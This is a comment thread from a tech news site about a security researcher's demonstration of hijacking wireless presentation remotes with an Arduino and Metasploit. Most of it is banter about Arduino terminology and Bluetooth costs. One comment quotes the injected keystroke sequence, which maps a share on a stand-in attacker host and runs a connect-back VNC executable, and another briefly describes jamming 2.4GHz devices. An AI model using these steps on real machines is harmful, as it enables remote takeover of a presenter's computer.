Wireless Presenters Attacked Using an Arduino 69
An anonymous reader writes "This week Dutch security researcher Niels Teusink described a method of attacking wireless presenter devices at an Amsterdam security conference. He had a demo showing how it is possible to use an Arduino and Metasploit to get remote code execution by sending arbitrary keystrokes to the presenter dongle. He has now released the code and made a blog post explaining how it all works. Better watch out the next time you're giving a presentation using one of these devices!"
Re:Microcontroller, not Arduino (Score:5, Informative)
Strictly speaking, Arduinos aren't microcontrollers. They're a popular hobbyist embedded platform based around the Atmel AVR microcontroller family. Much like Dells are a particular brand of computer based around x86 architecture microprocessors.
But yes, "Arduino this", "Arduino that" gets tiring after a while. Arduinos have a huge following, but there are zillions of alternatives of all shapes and sizes (many of them better in many ways). There's nothing Arduino-specific about this hack.
Re:Microcontroller, not Arduino (Score:4, Informative)
Re: (Score:3, Informative)
Well, technically, Arduinos are defined as whatever Smart Projects labels an Arduino (it's their trademark). However, yeah, Arduinos (in common usage) are defined more by their software rather than their hardware(in particular, a compatible bootloader that works with the Arduino development environment), because you don't really need much hardware to make a modern microcontroller run.
Which really just goes on to prove that there isn't anything special about Arduino at all. It's really just a bog-standard si
Re: (Score:3, Interesting)
Re: (Score:3, Informative)
But yes, "Arduino this", "Arduino that" gets tiring after a while. Arduinos have a huge following, but there are zillions of alternatives of all shapes and sizes (many of them better in many ways). There's nothing Arduino-specific about this hack.
What's cool about Arduino is how it reduces development time through the use of readily available shields. So if he used any of them then it's worth mentioning and not if not (I skimmed but did not actually read the article, I didn't notice ANY of the Arduino details, but I did get momentarily flustered about the idea of owning a USBee.)
Speaking of cool stuff I could own, can anyone recommend a cheap USB JTAG with Windows and Linux support? I would accept RS232 as a second option. LPT is not eligible.
Re: (Score:2)
No shields, which is why it's rather pointless. He just used the SPI interface pins connected to one of these [digikey.com]. He even had to perform voltage level conversion.
To answer your question, you can just get any bitbanging USB JTAG interface based on the FT2232D or FT2232H chip. I own this one [tincantools.com], which also happens to include a USB to RS232 converter channel (since the FT2232 has two comm channels). FT2232D versions are more common but are only USB full-speed. FT2232H versions can bitbang faster, as they USB High-Sp
Re: (Score:2)
Yeah, I'll just buy that one when the time comes. Right now I'm "sitting at" this Gateway LT3201u 11" 'netbook' which has a chipset which will work with coreboot v2. So I'm thinking that I'm going to need to give it some love because Gateway refuses to kick out a BIOS which will enable AMD-V. Besides, the BIOS POST is a huge part of the boot time. Die, Gateway, Die.
Re: (Score:2)
You wouldn't say, "I attacked that system using a Dell" -- you'd say "I attacked that system using a computer"
You may be right, but if you'd actually read TFA, you would know that an Arduino was used in the exploit. But, hey, never let the facts get in the way of a good rant.
Re: (Score:2)
He isn't denying that an Arduino was used -- but rather that it's relevant data. You might read the text you're quoting for intended meaning, perhaps?
Re: (Score:2)
You would if you used a Dell computer. This guy DID use an Arduino, so it isn't incorrect or "fanboy-ish" to say "Arduino".
There's also a second issue here. If you say "I used a computer to do such and such" then it's understood that you were using any hardware running windows, apple, or linux operating systems. There's really only three options. Not so with microcontrollers. There's hundreds of microcontrollers and they're all significantly diff
Re: (Score:2)
Only if I were using some capability unavailable on non-Dell computers. Otherwise, why bother to call them out?
That matters a great deal if you're sharing your implementation with anyone who might want to reproduce your results. On the other hand, if you're not sharing your imp
Huh huh huh (Score:2, Funny)
You said "dongle".
hmmm.... (Score:5, Funny)
Useful for:
* Corporate espionage
* Screwing with professors at school
* Pissing off Steve Jobs.
We all know which one's most likely.
Re: (Score:1)
Re: (Score:2)
Re: (Score:2)
Most presenting devices have at least rudimentary pairing between remote and dongle. At least I know that the Keyspan remote I've been using for the last 5 or more years works that way. Just bringing another remote of the same kind would likely do nothing.
Re: (Score:2)
Most presenting devices have at least rudimentary pairing between remote and dongle.
Yes, but a lot of projectors also have remote controls, and they're usually not paired. Switching things off mid-presentation is deeply annoying to the presenter.
(I say this because of a presentation I once saw a friend do where his remote would (IIRC) bring up the configuration menu every time he switched page. Funny, but it forced him to switch to manual control.)
Re:hmmm.... (Score:5, Funny)
Re: (Score:3, Funny)
Re: (Score:1)
Re: (Score:3, Informative)
Did you rta? He demoed getting a Metasploit payload on the system
Re: (Score:2)
By your BS definition.
That's like saying cooking is only cooking when you produce all ingredients from the seed, etc.
Re: (Score:1)
Better attack (Score:4, Funny)
Re: (Score:2)
I read the headline and thought that was what it was about.
Re: (Score:3, Informative)
RTFA? (Score:5, Informative)
It's clear that you and the moderators haven't bothered to actually read the article. The research and tools used for the attack were non-trivial, and the impact is remote code execution.
Re: (Score:1, Informative)
Here's the super leet exploit from the article:
# [Win+R]
# net use X: http://attacker/webdavshare
# X:\VNCconnectback.exe
# [enter]
Attacker does this by sending keycode signals over RF, pretending to be the presenter's wireless remote. The hard part was reverse engineering presenter commands (he finds that replaying them works), and sniffing through channels to find the channel the presenter is using.
I'm in full agreement with the GP.
Re: (Score:2)
And how is this lame, or only a nuisance?
The attacker can get full control over the remote computer.
The exploit code is the least significant part of this. Any exploit code could be used. If the user needed to escalate privileges for instance then another vulnerability might be attacked. But who cares: the point is the presenter is vulnerable, and critically so. What has leet code got do with anything?
Re: (Score:2, Informative)
Re: (Score:1)
Re: (Score:1)
Arduiwenie found murdered in back alley.
--
Preparing to delete all files. Press any key to continue.
This is why standard protocols help (Score:5, Insightful)
Re:This is why standard protocols help (Score:5, Insightful)
While Bluetooth certainly has its issues and took a while to address all the early security concerns, I really wish wireless device creators would stop rolling their own protocols.
Yeah, but then the maker would have to licence the technology and that adds cost. The chip used in the device doesn't come with Bluetooth. It's a very simple chip.
I suspect that the problem here is that the engineer just didn't think about security.
Re: (Score:3, Informative)
AFAIK, Bluetooth is License-free. That is, the protocol, and all related specifications are free for implementation.
Of course you may still need to pay a little for a chip that implements it, but the same thing goes for any wireless chip, and I doubt Bluetooth is THAT much more expensive?
Re:This is why standard protocols help (Score:5, Informative)
Whereas your average Arduino board is about $20-30 or so, an Arduino board with Bluetooth costs about $150.
http://www.sparkfun.com/commerce/tutorial_info.php?tutorials_id=148 [sparkfun.com]
Yes, Bluetooth is that expensive. The ArduinoBT board uses an off-the-shelf BlueGiga WT11. Newark sells those for about $60.
http://www.newark.com/bluegiga/wt11-a-ai/class-1-bluetooth-2-0-edr-module/dp/15P4005 [newark.com]
Mind you, this is a Class 1 (i.e. long range) transmitter, using BT 2.0 and not BT 2.1. Compare this to a standard RF transmitter and receiver, which is a couple bucks per chip...
Re: (Score:3, Informative)
Hello? You can buy Bluetooth-USB-modules for as little as $3 from Amazon. And that is the price for a single item sold to a consumer. The prices of development-kit-level items is hardly comparable to the actual price to implement Bluetooth in a mass-produced gizmo.
I wonder how come you didn't find that the 433MHz wireless modems cost $40 at Sparkfun as well..
I believe a large reason, if not the largest, for not using Bluetooth in simple wireless gadgets is the amount of electricity it takes compared to a si
Re:This is why standard protocols help (Score:4, Informative)
Do you mean the Bluetooth USB modules used to add Bluetooth support to a PC that doesn't have it? Unfortunately, an embedded system doesn't have a desktop-class processor to run the Bluetooth stack.
Oh, and those el-cheap-o Bluetooth modules you're suggesting are probably very out-dated, which is why they're so cheap. That $3 module probably cost more when it was less than a year old and they weren't trying to dump the inventory that they can't sell at a higher price...
Re: (Score:2)
Oh, and those el-cheap-o Bluetooth modules you're suggesting are probably very out-dated, which is why they're so cheap. That $3 module probably cost more when it was less than a year old and they weren't trying to dump the inventory that they can't sell at a higher price...
But for keyboard simulation, you don't need a fancy high-speed module. You're talking a few bytes per second. A cheap module should be enough. Hardware that can do anything is more expensive than hardware which is more specialized to its task; flexibility costs.
Re: (Score:2)
The Arduino has 16k of flash memory and 2k of ram. It has exactly one hardware uart though other pins can act as software serial devices. It cannot act as a USB master like a PC without some help though it can act as a USB peripheral i.e. a usb to serial device. I may be able to hack apart that bluetooth dongle and get access to the bluetooth chip but I suspect the USB and bluetooth are integrated in one ASIC which won't allow that.
Re: (Score:2)
Ah, yes. The old "it cost more, therefore it must be better/newer/faster" generalization.
So, go have a look [google.com] at what's actually available. You'll see that while the prices do vary wildly, there is very little variation in terms of the actual products (aside from packaging) other than a handful of products that appear to actually be independently engineered (which is not necessarily a good thing).
Just to pick one particular product: B&H sells it [bhphotovideo.com] for $11.95. Computer Geeks has the same one [geeks.com] for $7.99.
Re: (Score:3, Informative)
Yeah, but then the maker would have to licence the technology and that adds cost. The chip used in the device doesn't come with Bluetooth. It's a very simple chip.
If there is demand, Wal-Mart will be happy to sell an unlicensed Bluetooth transmitter like the ones you can buy from DealExtreme, except in some packaging more elaborate than that usually used for crack rocks (i.e. a tiny ziploc.) That will help keep the costs down. :)
Of course, if all us nerds just tell all our non-nerd friends to stop buying the non-Bluetooth versions because they're broadcasting their passwords to the world, then a percentage of them will listen, and we can help stick a nail in the coff
Re: (Score:2)
I suspect that the problem here is that the bean counters didn't care about security.
That's usually been my experience.
Re: (Score:2)
Re: (Score:2)
Most of these devices don't use frequency hopping (FHSS) or even DSSS or any kind of interference resistance algorithm. Also, they run on 2.4ghz band because it's license free.
All you need is a dumb laptop running Linux, or even any other OS, with a wifi card.
All you have to do is set the card into raw mode (on Linux, usually setting monitor mode) to be able to inject packet.
Once done, inject packets as fast as you can on the same frequency. The packet contents doesn't matter at all. And done, jammed.
Works
Re: (Score:2)
Bluetooth is very complicated compared to other options, which content themselves basically with providing a serial port. This complexity and licensing costs add significantly to devices.
Heaven forbid... (Score:2)
...the presenters can't advance their PowerPoint slides...
Re:TV / VCR Remote in class (Score:4, Insightful)
In other cases, I imagine, the engineer in charge of knocking together the receiver unit (correctly) realized that implementing a general-purpose system for taking arbitrary keycodes encapsulated in whatever the proprietary RF protocol is and dumping them to the host system just like any USB HID device wouldn't be much harder than implementing just the 6 keycodes found on revision 1 of Product X and would save him from having to do it again when revision 1.1 adds another couple of buttons, and revision 2.0 has to have a special button for the ribbon interface, or whatever it happens to be.
Re: (Score:2)
Until somebody puts to
In summary (Score:2)
In other words, our desire for things cheap and shiny has made us vulnerable yet again. Its the lead-paint-on-toys problem, but this time the victims are not children.
Re: (Score:3, Insightful)
Re: (Score:2)
In other words, our desire for things cheap and shiny has made us vulnerable yet again. Its the lead-paint-on-toys problem, but this time the victims are not children.
Who are the victims? People giving presentations? And they're victims to people being jackasses?
Sorry, I just don't see that as comparable to children (or anyone) being poisoned by lead. Security is always about risk. There's a million ways to be a dumb ass during a presentation, be it the tv b gone [wikipedia.org] or something about equally as childish b
Re: (Score:2)
If Arduinos are outlawed (Score:2)
Then only outlaws.. or something like that..
Real men use ARM microcontrollers (Score:1)
Yeah, no big deal that some one used an AVR or PIC microcontroller to do something.
You need to put away your toys and be a man by stepping up to an ARM microcontroller.